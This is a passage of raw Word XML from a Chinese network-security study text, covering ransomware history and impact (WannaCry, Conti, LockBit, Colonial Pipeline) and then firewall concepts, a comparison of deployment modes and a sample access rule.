        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三代（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2017</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>至今）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598C3218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代表：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WannaCry</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conti</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LockBit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A9CEE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特点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F134AF9" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用漏洞横向传播（如永恒之蓝）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22301DAE" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双重勒索：加密</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>威胁泄露数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEF735B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>勒索即服务（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RaaS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）商业模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F29270D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危害：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CBF205" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年全球损失</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>亿美元</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33106A8E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爱尔兰卫生系统瘫痪致手术延期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D4A108" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>美国最大燃油管道</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Colonial</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支付</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>440</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>万美元赎金</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53326268" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>防火墙与安全设备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF619F4" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>传统防火墙核心概念</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524E8E3D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基本定义：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB3A9E1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防火墙是网络安全的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>门卫</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，根据预设规则控制网络流量进出。就像小区保安，根据业主名单决定谁可以进入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4988EFE9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核心功能：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256888F3" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问控制：通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口决定放行或阻断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365A9ACF" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络隔离：划分信任区（内网）和非信任区（互联网）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF1CA72" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址转换（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：隐藏内网</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.100 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公网</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F049AF" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="482"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Hlk200725959"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>部署模式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>对比：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0747A95A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>防火墙部署模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93"/>
        <w:gridCol w:w="2460"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="2965"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="2185CF5D" w14:textId="77777777" w:rsidTr="00501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3388F06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模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="139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BD3D544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原理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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8A93D63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适用场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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FA4D4D5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优缺点</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="5971837D" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="731" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2570F07D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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>路由模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1391" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="78C6ACBF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作为三层网关转发数据包</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1202" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="78DE0435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企业出口网关</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="785469F3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支持完整功能，需修改网络拓扑</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="74BCD7DD" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="731" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="72CE481F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rFonts w:cs="Times New Roman"/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透明模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1391" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6EB1B4CF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类似网桥串联在网络中</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1202" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="32726A9A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已有网关的扩容防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6A706418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零配置接入，不支持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NAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="2DB57B0F" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="731" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0BB22FC0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混合模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1391" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4DDE92F8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同时支持路由和透明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1202" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6EB9131A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复杂网络改造</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4D1EB292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灵活但配置复杂</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="263EB722" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F044E2B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经典案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7337B803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某公司部署：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9B369D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互联网</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防火墙</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由模式</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">)] </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>核心交换机</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>办公网</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8AF1B0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配置规则：仅允许</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP 80/443</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入站，阻断所有其他访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0966BFD0" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>七大安全设备应用场景详解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D93DFE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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>传统防火墙</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2C124A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作用：网络层访问控制（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口级）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C672A1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场景：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23286AD9" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支机构互联网出口</w:t>
      </w:r>
    </w:p>
